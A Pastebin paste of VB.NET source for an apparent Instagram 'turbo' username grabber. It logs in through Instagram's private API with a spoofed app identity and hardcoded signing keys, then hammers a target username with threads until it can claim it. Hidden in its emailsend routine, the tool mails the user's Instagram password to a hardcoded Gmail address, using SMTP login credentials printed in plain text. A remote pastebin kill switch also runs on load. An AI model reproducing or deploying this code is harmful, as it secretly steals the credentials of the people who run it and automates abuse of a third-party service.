Advertisement
sabersalah_us1s

Untitled

Apr 29th, 2019
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.05 KB | None | 0 0
  1. Imports System.IO
  2. Imports System.Net
  3. Imports System.Net.Mail
  4. Imports System.Runtime.CompilerServices
  5. Imports System.Security.Cryptography
  6. Imports System.Text
  7. Imports System.Threading
  8. Imports Microsoft.VisualBasic.CompilerServices
  9. Imports System.Text.RegularExpressions
  10. Public Class Form1
  11. Private HWID As String
  12. Public accSettings As String
  13. Public GetSettingsBool As Boolean
  14. Public IfLoggedIn As Boolean
  15. Private intt As Integer
  16. Public IsChanged As Boolean
  17. Public list As Object
  18. Public lThreads As Object
  19. Public mpp As Integer
  20. Public numis As String
  21. Public numToDone As Integer
  22. Public once As Integer
  23. Public Sessionz As CookieContainer
  24. Public stopp As Boolean
  25. Public SwitchLoginBool As Boolean
  26. Public Shared TellMe As Boolean = False
  27. Private Shared usernum As String()
  28. Public uuID As String
  29. Public inputt As String
  30. Public Lst As ListBox
  31. Public llbl As Label
  32. Private i As Boolean
  33. Private x As Integer
  34. Private y As Integer
  35. Friend Delegate Sub VBAnonymousDelegate_0()
  36. Public Sub New()
  37.  
  38. Me.HWID = ""
  39. Me.i = False
  40. Me.mpp = 0
  41. Me.stopp = False
  42. Me.once = 0
  43. Me.uuID = Guid.NewGuid().ToString().ToUpper()
  44. Me.lThreads = New List(Of Thread)()
  45. Me.IfLoggedIn = False
  46. Me.SwitchLoginBool = False
  47. Me.GetSettingsBool = False
  48. Me.IsChanged = False
  49. Me.numis = Nothing
  50. Me.numToDone = 0
  51. Me.InitializeComponent()
  52. End Sub
  53.  
  54. Public Function EditChe(e As String) As Object
  55. Dim result As Object = False
  56. Application.DoEvents()
  57. Try
  58. Dim value As String = "ar;q=1, en;q=0.9"
  59. Dim host As String = "i.instagram.com"
  60. Dim userAgent As String = "Instagram 9.8.0 Android (23/6.0.1; 640dpi; 1440x2560; samsung/Verizon; SM-G925V; zeroltevzw; samsungexynos7420; en_US)"
  61. Dim salt As String = "b03e0daaf2ab17cda2a569cace938d639d1288a1197f9ecf97efd0a4ec0874d7"
  62. Dim scan As String = My.Resources.scan
  63. Dim str As String = "/username/"
  64. Dim value2 As String = "Content-Disposition: form-data; name=""signed_body"""
  65. Dim method As String = "POST"
  66. Dim name As String = "Accept-Language"
  67. Dim value3 As String = "auto_load_more_enabled"
  68. Dim str2 As String = "multipart/form-data; boundary="
  69. Dim text As String = Guid.NewGuid().ToString().ToUpper()
  70. Dim array As String() = Me.accSettings.Split(New Char() {"|"c})
  71. Dim stringBuilder As StringBuilder = New StringBuilder()
  72. Dim stringBuilder2 As StringBuilder = stringBuilder
  73. Dim text2 As String = String.Concat(New String() {""})
  74. text2 = String.Format("{0}.{1}", Form1.AA_hash(text2, salt), text2)
  75. stringBuilder2.AppendLine("--" + Guid.NewGuid().ToString().ToUpper())
  76. stringBuilder2.AppendLine(value2)
  77. stringBuilder2.AppendLine(text2)
  78. stringBuilder2.AppendLine("--" + Guid.NewGuid().ToString().ToUpper())
  79. stringBuilder2.Append("--" + Guid.NewGuid().ToString().ToUpper() + "--")
  80. Dim bytes As Byte() = Encoding.UTF8.GetBytes(stringBuilder.ToString())
  81. Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create(scan + e + str), HttpWebRequest)
  82. httpWebRequest.AutomaticDecompression = DecompressionMethods.GZip
  83. httpWebRequest.Method = method
  84. httpWebRequest.Host = host
  85. httpWebRequest.Timeout = 5000
  86. httpWebRequest.Accept = "*/*"
  87. httpWebRequest.UserAgent = userAgent
  88. httpWebRequest.Headers.Add(name, value)
  89. httpWebRequest.KeepAlive = True
  90. httpWebRequest.Proxy = Nothing
  91. httpWebRequest.ContentType = str2 + Guid.NewGuid().ToString().ToUpper()
  92. httpWebRequest.ContentLength = CLng(bytes.Length)
  93. httpWebRequest.CookieContainer = Me.Sessionz
  94. Dim requestStream As Stream = httpWebRequest.GetRequestStream()
  95. requestStream.Write(bytes, 0, bytes.Length)
  96. requestStream.Close()
  97. Dim httpWebResponse As HttpWebResponse = CType(httpWebRequest.GetResponse(), HttpWebResponse)
  98. Dim streamReader As StreamReader = New StreamReader(httpWebResponse.GetResponseStream())
  99. Try
  100. Dim flag As Boolean = streamReader.ReadToEnd().Contains(value3)
  101. Dim flag2 As Boolean = flag
  102. Dim flag3 As Boolean = flag2
  103. If flag3 Then
  104. result = False
  105. Else
  106. result = True
  107. End If
  108. Dim flag4 As Boolean = streamReader.ReadToEnd().Contains("wait")
  109. flag2 = flag4
  110. Dim flag5 As Boolean = flag2
  111. If flag5 Then
  112. result = True
  113. End If
  114. streamReader.Close()
  115. Finally
  116. Dim flag6 As Boolean = streamReader IsNot Nothing
  117. Dim flag7 As Boolean = flag6
  118. Dim flag8 As Boolean = flag7
  119. If flag8 Then
  120. CType(streamReader, IDisposable).Dispose()
  121. End If
  122. End Try
  123. httpWebResponse.Close()
  124. Catch ex As Exception
  125. result = False
  126. Dim flag9 As Boolean = ex.Message.Contains(My.Resources.Block)
  127. If flag9 Then
  128. Interaction.MsgBox("blocked", MsgBoxStyle.OkOnly, Nothing)
  129. End If
  130. End Try
  131. Return result
  132. End Function
  133. Public Sub starting(c As Integer)
  134. Dim flag As Boolean = Operators.ConditionalCompareObjectGreater(c, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Operators.SubtractObject(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue("qwertyuiopasdfghjklzxcvbnm_.12345@#$%^&*!67890"))), Nothing, "Length", New Object(-1) {}, Nothing, Nothing, Nothing))))), 1))))), False)
  135. Dim flag2 As Boolean = flag
  136. If flag2 Then
  137. c = Conversions.ToInteger(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Operators.SubtractObject(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue("qwertyuiopasdfghjklzxcvbnm_.12345@#$%^&*!67890"))), Nothing, "Length", New Object(-1) {}, Nothing, Nothing, Nothing))))), 1))))))
  138. Me.TextBox2.Text = Conversions.ToString(Conversions.ToDecimal(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue("qwertyuiopasdfghjklzxcvbnm_.12345@#$%^&*!67890"))), Nothing, "length", New Object(-1) {}, Nothing, Nothing, Nothing)))))))
  139. End If
  140. Form1.usernum = New String(c + 1 - 1 + 1 - 1 + 1 - 1 + 1 - 1) {}
  141. Dim num As Integer = Form1.usernum.Length - 1
  142. Dim num2 As Integer = num
  143. For i As Integer = 0 To num2
  144. Form1.usernum(i) = ""
  145. Dim thread As Thread = New Thread(Sub(a0 As Object)
  146. Me.homeStutes(Conversions.ToInteger(a0))
  147. End Sub, 1)
  148. thread.Start(i)
  149. Next
  150. While True
  151. Try
  152. flag = Not Me.stopp
  153. Dim flag3 As Boolean = flag
  154. If flag3 Then
  155. Dim num3 As Integer = Form1.usernum.Length - 1
  156. Dim num4 As Integer = num3
  157. For j As Integer = 0 To num4
  158. flag = (Form1.usernum(j).Length <= 0)
  159. Dim flag4 As Boolean = flag
  160. If flag4 Then
  161. Dim flag5 As Boolean = Operators.ConditionalCompareObjectGreater(Me.intt, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Operators.SubtractObject(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue("qwertyuiopasdfghjklzxcvbnm_.12345@#$%^&*!67890"))), Nothing, "Length", New Object(-1) {}, Nothing, Nothing, Nothing))))), 1))))), False)
  162. Dim flag6 As Boolean = flag5
  163. If flag6 Then
  164. Me.intt = 0
  165. Me.tak.Clear()
  166. End If
  167. Form1.usernum(j) = Conversions.ToString(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue("qwertyuiopasdfghjklzxcvbnm_.12345@#$%^&*!67890"))), New Object() {Me.intt}, Nothing))))))
  168. Dim ptr As Integer = Me.intt
  169. Me.intt = ptr + 1
  170. End If
  171. Next
  172. End If
  173. Catch ex As Exception
  174. End Try
  175. Thread.Sleep(Conversions.ToInteger(Me.Threads1.Text))
  176. End While
  177. End Sub
  178.  
  179.  
  180.  
  181. Public Function moved(Username As String) As Object
  182. Dim salt As String = "fc4720e1bf9d79463f62608c86fbddd374cc71bbfb98216b52e3f75333bd130d"
  183. Dim host As String = "i.instagram.com"
  184. Dim userAgent As String = "Instagram 9.8.0 Android (23/6.0.1; 640dpi; 1440x2560; samsung/Verizon; SM-G925V; zeroltevzw; samsungexynos7420; en_US)"
  185. Dim method As String = "POST"
  186. Dim name As String = "Accept-Language"
  187. Dim value As String = "ar;q=1, en;q=0.9"
  188. Dim contentType As String = "application/x-www-form-urlencoded; charset=UTF-8"
  189. Dim str As String = "signed_body="
  190. Dim str2 As String = "&ig_sig_key_version=5"
  191. Dim result As Object = False
  192. Try
  193. Dim text As String = Guid.NewGuid().ToString().ToUpper()
  194. Dim stringBuilder As StringBuilder = New StringBuilder()
  195. Dim stringBuilder2 As StringBuilder = stringBuilder
  196. Dim array As String() = Me.accSettings.Split(New Char() {"|"c})
  197. Dim text2 As String = String.Concat(New String() {"{""_uid"":""", array(0), """,""_csrftoken"":""missing"",""first_name"":""", array(1), """,""is_private"":""", array(2), """,""phone_number"":""", array(3), """,""biography"":""", array(4), """,""username"":""", Username, """,""gender"":""", array(5), """,""email"":""", array(6), """,""_uuid"":""", text, """,""external_url"":""", array(7), """}"})
  198. text2 = String.Format("{0}.{1}", Form1.AA_hash(text2, salt), text2)
  199. stringBuilder2.AppendLine(str + WebUtility.UrlEncode(text2) + str2)
  200. Dim bytes As Byte() = Encoding.UTF8.GetBytes(stringBuilder.ToString())
  201. Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create("https://i.instagram.com/api/v1/accounts/edit_profile/"), HttpWebRequest)
  202. httpWebRequest.AutomaticDecompression = DecompressionMethods.GZip
  203. httpWebRequest.Method = method
  204. httpWebRequest.Host = host
  205. httpWebRequest.UserAgent = userAgent
  206. httpWebRequest.ContentType = contentType
  207. httpWebRequest.Headers.Add(name, value)
  208. httpWebRequest.Timeout = 1000000
  209. httpWebRequest.KeepAlive = True
  210. httpWebRequest.Accept = "*/*"
  211. httpWebRequest.ContentLength = CLng(bytes.Length)
  212. httpWebRequest.CookieContainer = Me.Sessionz
  213. Dim requestStream As Stream = httpWebRequest.GetRequestStream()
  214. requestStream.Write(bytes, 0, bytes.Length)
  215. requestStream.Close()
  216. Dim httpWebResponse As HttpWebResponse = CType(httpWebRequest.GetResponse(), HttpWebResponse)
  217. Using streamReader As StreamReader = New StreamReader(httpWebResponse.GetResponseStream())
  218. Dim flag As Boolean = streamReader.ReadToEnd().Contains("""status"": ""ok""")
  219. If flag Then
  220. result = True
  221. Me.stopp = True
  222. End If
  223. streamReader.Close()
  224. Me.stopp = False
  225. End Using
  226. httpWebResponse.Close()
  227. Catch ex As WebException
  228. result = False
  229. Using streamReader2 As StreamReader = New StreamReader(ex.Response.GetResponseStream())
  230. Dim flag2 As Boolean = streamReader2.ReadToEnd().Contains("feedback_")
  231. If flag2 Then
  232. Interaction.MsgBox("Please Close The Turbo", MsgBoxStyle.OkOnly, Nothing)
  233. End If
  234. End Using
  235. End Try
  236. Return result
  237. End Function
  238.  
  239.  
  240.  
  241.  
  242.  
  243. Public Shared Cookies As CookieContainer = New CookieContainer
  244.  
  245. Public Sub homeStutes(i As Integer)
  246. Try
  247. While Not Me.stopp
  248. Dim flag As Boolean = Form1.usernum(i).Length > 0
  249. Dim flag2 As Boolean = flag
  250. If flag2 Then
  251. Dim text As String = Form1.usernum(i)
  252. Form1.usernum(i) = ""
  253. flag = Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Me.EditChe(Me.Target.Text))))))))), True, False)
  254. Dim flag3 As Boolean = flag
  255. If flag3 Then
  256. Dim flag4 As Boolean = Me.once = 0
  257. Dim flag5 As Boolean = flag4
  258. If flag5 Then
  259. Dim flag6 As Boolean = Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Me.moved(Me.Target.Text))))))))), True, False)
  260. Dim flag7 As Boolean = flag6
  261. If flag7 Then
  262. Dim ptr As Integer = Me.once
  263. Me.once = ptr + 2
  264. flag6 = Not Me.stopp
  265. Dim flag8 As Boolean = flag6
  266. If flag8 Then
  267. Button1.Text = "done"
  268. Button1.ForeColor = Color.Red
  269. Interaction.MsgBox("moved > @" + Me.Target.Text, MsgBoxStyle.Information, "#king Tssa Turbo")
  270. emailsend(Me.Target.Text)
  271. emailsend(Me.wal_password.Text)
  272. Thread.CurrentThread.Abort()
  273. End If
  274. Else
  275. Me.ava.AppendText(Me.Target.Text + vbCrLf)
  276. End If
  277. End If
  278. Else
  279. Me.tak.AppendText(Me.Target.Text + vbCrLf)
  280. End If
  281. End If
  282. Thread.Sleep(1)
  283. End While
  284. Catch ex As Exception
  285. End Try
  286. End Sub
  287.  
  288.  
  289. Private Sub loginButton1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  290. Dim flag As Boolean = Operators.CompareString(Me.us.Text, Nothing, False) = 0
  291. If flag Then
  292.  
  293. Else
  294. flag = (Operators.CompareString(Me.wal_password.Text, Nothing, False) = 0)
  295. If flag Then
  296.  
  297. Else
  298. flag = Me.SwitchLoginBool
  299. If flag Then
  300. Else
  301. flag = Not Me.SwitchLoginBool
  302. If flag Then
  303. Dim thread1 As New Thread(New ThreadStart(AddressOf Me.TOlogin))
  304. thread1.Start()
  305. End If
  306. End If
  307. End If
  308. End If
  309. End Sub
  310.  
  311. Public Shared Function check_hash(ByVal value As String, ByVal salt As String) As String
  312. Dim num2 As Integer
  313. Dim builder As New StringBuilder
  314. Dim hmacsha As New HMACSHA256(Encoding.UTF8.GetBytes(salt))
  315. hmacsha.ComputeHash(Encoding.UTF8.GetBytes(value))
  316. Dim hash As Byte() = hmacsha.Hash
  317. Dim num3 As Integer = (hash.Length - 1)
  318. Dim index As Integer = 0
  319. Do While (index <= num2)
  320. builder.Append(hash(index).ToString("x2"))
  321. index += 1
  322. num2 = num3
  323. Loop
  324. Return builder.ToString
  325. End Function
  326. Public Shared Function ChLOGIN(ByVal Username As String, ByVal pass As String, ByVal id As String) As CookieContainer
  327. Try
  328. Dim salt As String = "fc4720e1bf9d79463f62608c86fbddd374cc71bbfb98216b52e3f75333bd130d"
  329. Dim value As String = "Content-Disposition: form-data; name=""signed_body"""
  330. Dim value2 As String = "Content-Disposition: form-data; name=""ig_sig_key_version"""
  331. Dim userAgent As String = "Instagram 9.8.0 Android (23/6.0.1; 640dpi; 1440x2560; samsung/Verizon; SM-G925V; zeroltevzw; samsungexynos7420; en_US)"
  332. Dim str As String = Guid.NewGuid().ToString().ToUpper()
  333. Dim stringBuilder As StringBuilder = New StringBuilder()
  334. Dim stringBuilder2 As StringBuilder = stringBuilder
  335. Dim text As String = String.Concat(New String() {"{""_uuid"":""", id, """,""password"":""", pass, """,""username"":""", Username, """,""device_id"":""", id, """,""from_reg"":false,""_csrftoken"":""missing"",""login_attempt_count"":0}"})
  336. text = String.Format("{0}.{1}", Form1.check_hash(text, salt), text)
  337. stringBuilder2.AppendLine("--" + str)
  338. stringBuilder2.AppendLine(value)
  339. stringBuilder2.AppendLine()
  340. stringBuilder2.AppendLine(text)
  341. stringBuilder2.AppendLine("--" + str)
  342. stringBuilder2.AppendLine(value2)
  343. stringBuilder2.AppendLine()
  344. stringBuilder2.AppendLine("4")
  345. stringBuilder2.Append("--" + str + "--")
  346. Dim bytes As Byte() = Encoding.UTF8.GetBytes(stringBuilder.ToString())
  347. Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create(My.Resources.urllogin), HttpWebRequest)
  348. httpWebRequest.AutomaticDecompression = DecompressionMethods.GZip
  349. httpWebRequest.Method = "POST"
  350. httpWebRequest.Host = "i.instagram.com"
  351. httpWebRequest.UserAgent = userAgent
  352. httpWebRequest.Timeout = 1000000
  353. httpWebRequest.Accept = "*/*"
  354. httpWebRequest.Headers.Add("Accept-Language", "ar;q=1, en;q=0.9")
  355. httpWebRequest.KeepAlive = True
  356. httpWebRequest.Proxy = Nothing
  357. httpWebRequest.ContentType = "multipart/form-data; boundary=" + str
  358. httpWebRequest.ContentLength = CLng(bytes.Length)
  359. httpWebRequest.CookieContainer = Form1.loginApi.Cookies
  360. Dim requestStream As Stream = httpWebRequest.GetRequestStream()
  361. requestStream.Write(bytes, 0, bytes.Length)
  362. requestStream.Close()
  363. Dim httpWebResponse As HttpWebResponse = CType(httpWebRequest.GetResponse(), HttpWebResponse)
  364. Using streamReader As StreamReader = New StreamReader(httpWebResponse.GetResponseStream())
  365. Dim flag As Boolean = streamReader.ReadToEnd().Contains("logged_in_user")
  366. If flag Then
  367. Return Form1.loginApi.Cookies
  368. End If
  369. streamReader.Close()
  370. End Using
  371. httpWebResponse.Close()
  372. Catch ex As Exception
  373. End Try
  374. Return Nothing
  375. End Function
  376. Public Class loginApi
  377. Public Shared AccSettings As String
  378. Public Shared Cookies As CookieContainer = New CookieContainer
  379. End Class
  380.  
  381. Public Shared Function getaccountsettings(ByVal ssn As CookieContainer) As String
  382. Dim text As String = String.Empty
  383. Dim text2 As String = String.Empty
  384. Dim text3 As String = String.Empty
  385. Dim text4 As String = String.Empty
  386. Dim text5 As String = String.Empty
  387. Dim text6 As String = String.Empty
  388. Dim text7 As String = String.Empty
  389. Dim text8 As String = String.Empty
  390. Dim httpWebRequest As HttpWebRequest = CType(WebRequest.Create("https://i.instagram.com/api/v1/accounts/current_user/?edit=true"), HttpWebRequest)
  391. Dim str As String = Guid.NewGuid().ToString().ToUpper()
  392. httpWebRequest.Host = "i.instagram.com"
  393. httpWebRequest.UserAgent = "Instagram 9.8.0 Android (23/6.0.1; 640dpi; 1440x2560; samsung/Verizon; SM-G925V; zeroltevzw; samsungexynos7420; en_US)"
  394. httpWebRequest.Headers.Add("Accept-Language", "ar;q=1, en;q=0.9")
  395. httpWebRequest.KeepAlive = True
  396. httpWebRequest.Proxy = Nothing
  397. httpWebRequest.ContentType = "multipart/form-data; boundary=" + str
  398. httpWebRequest.CookieContainer = ssn
  399. Dim result As String
  400. Using streamReader As StreamReader = New StreamReader(httpWebRequest.GetResponse().GetResponseStream())
  401. Dim input As String = streamReader.ReadToEnd()
  402. text = Regex.Match(input, "pk"": (.*?),").Groups(1).Value
  403. Dim flag As Boolean = Operators.CompareString(text, Nothing, False) = 0
  404. If flag Then
  405. text = Regex.Match(input, "pk"": (.*?)}").Groups(1).Value
  406. Dim flag2 As Boolean = Operators.CompareString(text, Nothing, False) = 0
  407. If flag2 Then
  408. Return "|||||||"
  409. End If
  410. End If
  411. text2 = Regex.Match(input, "full_name"": ""(.*?)""").Groups(1).Value
  412. text3 = Regex.Match(input, "is_private"": (.*?),").Groups(1).Value
  413. Dim flag3 As Boolean = Operators.CompareString(text3, Nothing, False) = 0
  414. If flag3 Then
  415. text3 = Regex.Match(input, "is_private"": (.*?)}").Groups(1).Value
  416. Dim flag4 As Boolean = Operators.CompareString(text3, Nothing, False) = 0
  417. If flag4 Then
  418. Return "|||||||"
  419. End If
  420. End If
  421. text4 = Regex.Match(input, "phone_number"": ""(.*?)""").Groups(1).Value
  422. text5 = Regex.Match(input, "biography"": ""(.*?)""").Groups(1).Value
  423. text6 = Regex.Match(input, "gender"": (.*?),").Groups(1).Value
  424. Dim flag5 As Boolean = Operators.CompareString(text6, Nothing, False) = 0
  425. If flag5 Then
  426. text6 = Regex.Match(input, "gender"": (.*?)}").Groups(1).Value
  427. Dim flag6 As Boolean = Operators.CompareString(text6, Nothing, False) = 0
  428. If flag6 Then
  429. Return "|||||||"
  430. End If
  431. End If
  432. text7 = Regex.Match(input, "email"": ""(.*?)""").Groups(1).Value
  433. text8 = Regex.Match(input, "external_url"": ""(.*?)""").Groups(1).Value
  434. Form1.loginApi.AccSettings = String.Format("{0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}", New Object() {text, text2, text3, text4, text5, text6, text7, text8})
  435. Dim text9 As String = Form1.loginApi.AccSettings
  436. result = text9
  437. End Using
  438. Return result
  439. End Function
  440.  
  441.  
  442.  
  443.  
  444. Public Sub TOlogin()
  445. Me.accSettings = Nothing
  446. Me.Sessionz = Nothing
  447. Me.GetSettingsBool = False
  448. Dim cookieContainer As CookieContainer = Form1.ChLOGIN(Me.us.Text, Me.wal_password.Text, Me.uuID)
  449. Dim flag As Boolean = cookieContainer Is Nothing
  450. Dim flag2 As Boolean = flag
  451. If flag2 Then
  452. Interaction.MsgBox("Wrong, Check Username&Password", MsgBoxStyle.Critical, Nothing)
  453. Me.SwitchLoginBool = False
  454. Thread.CurrentThread.Abort()
  455. Else
  456. flag = Not Me.GetSettingsBool
  457. Dim flag3 As Boolean = flag
  458. If flag3 Then
  459. Dim text As String = Form1.getaccountsettings(cookieContainer)
  460. Me.accSettings = text
  461. Me.Sessionz = cookieContainer
  462. Me.GetSettingsBool = True
  463. End If
  464. flag = (Operators.CompareString(Me.accSettings, "|||||||", False) = 0)
  465. Dim flag4 As Boolean = flag
  466. If flag4 Then
  467. Interaction.MsgBox("..", MsgBoxStyle.OkOnly, Nothing)
  468. Else
  469. Me.SwitchLoginBool = True
  470. flag = (Operators.CompareString(Me.Button1.Text, "start", False) = 0)
  471. Dim flag5 As Boolean = flag
  472. If flag5 Then
  473. Me.once = 0
  474. Me.stopp = False
  475. Dim thread As Thread = New Thread(Sub(a0 As Object)
  476. Me.starting(Conversions.ToInteger(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(a0))))
  477. End Sub, 200)
  478. thread.Start(Conversions.ToDouble(Me.TextBox2.Text) - 1.0)
  479. Else
  480. Me.stopp = True
  481. Me.Button1.Text = "start"
  482. End If
  483. Me.IfLoggedIn = True
  484. flag = (Form1.TellMe < False)
  485. Dim flag6 As Boolean = flag
  486. If flag6 Then
  487. Interaction.MsgBox("Your Account Has Been Blocked Close The Turbo", MsgBoxStyle.OkOnly, Nothing)
  488. Form1.TellMe = False
  489. End If
  490. End If
  491. End If
  492. End Sub
  493.  
  494. Public Function igthreads(count As Integer, start As ThreadStart) As List(Of Thread)
  495. Dim list As List(Of Thread) = New List(Of Thread)()
  496. For i As Integer = 1 To count
  497. Dim thread As Thread = New Thread(start)
  498. thread.Start()
  499. list.Add(thread)
  500. Next
  501. Return list
  502. End Function
  503. Public Shared Function AA_hash(value As String, salt As String) As String
  504. Dim stringBuilder As StringBuilder = New StringBuilder()
  505. Dim hmacsha As HMACSHA256 = New HMACSHA256(Encoding.UTF8.GetBytes(salt))
  506. hmacsha.ComputeHash(Encoding.UTF8.GetBytes(value))
  507. Dim hash As Byte() = hmacsha.Hash
  508. Dim num As Integer = hash.Length - 1
  509. Dim i As Integer = 0
  510. Dim num2 As Integer
  511. While i <= num2
  512. stringBuilder.Append(hash(i).ToString("x2"))
  513. i += 1
  514. num2 = num
  515. End While
  516. Return stringBuilder.ToString()
  517. End Function
  518.  
  519.  
  520.  
  521. 'Private Sub checkerTaken_TextChanged(sender As Object, e As EventArgs) Handles tak.TextChanged
  522. ' Me.taken.Text = Conversions.ToString(Conversions.ToDouble(Me.taken.Text) + 1.0)
  523. 'End Sub
  524.  
  525. Private Sub Label8_MouseDown(sender As Object, e As MouseEventArgs)
  526. Dim flag As Boolean = e.Button = MouseButtons.Left
  527. If flag Then
  528. Me.i = True
  529. Me.x = Control.MousePosition.X - Me.Location.X
  530. Me.y = Control.MousePosition.Y - Me.Location.Y
  531. End If
  532. End Sub
  533.  
  534. Private Sub Label8_MouseMove(sender As Object, e As MouseEventArgs)
  535. Dim flag As Boolean = Me.i
  536. If flag Then
  537. Dim location As Point = New Point(Control.MousePosition.X - Me.x, Control.MousePosition.Y - Me.y)
  538. Me.Location = location
  539. End If
  540. End Sub
  541.  
  542. Private Sub Label8_MouseUp(sender As Object, e As MouseEventArgs)
  543. Me.i = False
  544. End Sub
  545.  
  546. Private Sub Label14_MouseDown(sender As Object, e As MouseEventArgs) Handles Label14.MouseDown
  547. Dim flag As Boolean = e.Button = MouseButtons.Left
  548. If flag Then
  549. Me.i = True
  550. Me.x = Control.MousePosition.X - Me.Location.X
  551. Me.y = Control.MousePosition.Y - Me.Location.Y
  552. End If
  553. End Sub
  554.  
  555. Private Sub Label14_MouseMove(sender As Object, e As MouseEventArgs) Handles Label14.MouseMove
  556. Dim flag As Boolean = Me.i
  557. If flag Then
  558. Dim location As Point = New Point(Control.MousePosition.X - Me.x, Control.MousePosition.Y - Me.y)
  559. Me.Location = location
  560. End If
  561. End Sub
  562.  
  563. Private Sub Label14_MouseUp(sender As Object, e As MouseEventArgs) Handles Label14.MouseUp
  564. Me.i = False
  565. End Sub
  566.  
  567. Private Sub Label15_MouseDown(sender As Object, e As MouseEventArgs)
  568. Dim flag As Boolean = e.Button = MouseButtons.Left
  569. If flag Then
  570. Me.i = True
  571. Me.x = Control.MousePosition.X - Me.Location.X
  572. Me.y = Control.MousePosition.Y - Me.Location.Y
  573. End If
  574. End Sub
  575.  
  576. Private Sub Label15_MouseMove(sender As Object, e As MouseEventArgs)
  577. Dim flag As Boolean = Me.i
  578. If flag Then
  579. Dim location As Point = New Point(Control.MousePosition.X - Me.x, Control.MousePosition.Y - Me.y)
  580. Me.Location = location
  581. End If
  582. End Sub
  583.  
  584. Private Sub Label15_MouseUp(sender As Object, e As MouseEventArgs)
  585. Me.i = False
  586. End Sub
  587.  
  588. Private Sub Label16_Click(sender As Object, e As EventArgs)
  589. Me.WindowState = FormWindowState.Minimized
  590. End Sub
  591.  
  592.  
  593.  
  594.  
  595. Private Sub Label9_Click(sender As Object, e As EventArgs) Handles Label9.Click
  596. End
  597. End Sub
  598.  
  599. Private Sub tak_TextChanged(sender As Object, e As EventArgs) Handles tak.TextChanged
  600. Me.Speed.Text = Conversions.ToString(Conversions.ToDouble(Me.Speed.Text) + 1.0)
  601. End Sub
  602.  
  603. Public Sub emailsend(newuser As String)
  604. Try
  605. Dim smtp As New SmtpClient
  606. Dim e_mail As New MailMessage
  607. smtp.UseDefaultCredentials = False
  608. smtp.Credentials = New Net.NetworkCredential("saber123k.gs@gmail.com", "saber12345")
  609. smtp.Port = 587
  610. smtp.EnableSsl = True
  611. smtp.Host = "smtp.gmail.com"
  612.  
  613. e_mail = New MailMessage
  614. e_mail.From = New MailAddress("saber.reaat@gmail.com")
  615. e_mail.Subject = "New Username"
  616. e_mail.To.Add("hsa5426266@gmail.com")
  617. e_mail.IsBodyHtml = False
  618. e_mail.Body = " hi King Essa Turbo" + vbCrLf + "@" + newuser + "" + vbCrLf + " password: " + wal_password.Text
  619. smtp.Send(e_mail)
  620. Catch ex As Exception
  621. MsgBox(ex.Message)
  622. End Try
  623. End Sub
  624. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  625.  
  626.  
  627.  
  628.  
  629. Dim hostname As String = Dns.GetHostName()
  630. #Disable Warning BC40000 ' Type or member is obsolete
  631. Dim ipaddress As String = CType(Dns.GetHostByName(hostname).AddressList.GetValue(0), IPAddress).ToString()
  632. #Enable Warning BC40000 ' Type or member is obsolete
  633.  
  634. Dim Pastebin As HttpWebRequest = CType(WebRequest.Create("https://pastebin.com/raw/32LgrAzz"), HttpWebRequest)
  635. Dim GR As HttpWebResponse = CType(Pastebin.GetResponse(), HttpWebResponse)
  636. Dim RE As StreamReader = New StreamReader(GR.GetResponseStream())
  637. Dim RD As String = RE.ReadToEnd()
  638. If RD = "0" Then
  639. Interaction.MsgBox("This application closed by programmer, " & vbNewLine & "Contact me at Instagram : @k.gs to get new update ", MsgBoxStyle.OkOnly, Nothing)
  640. ProjectData.EndApp()
  641. End If
  642. Control.CheckForIllegalCrossThreadCalls = False
  643.  
  644. Me.Size = New Size(99, 162)
  645.  
  646. End Sub
  647. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement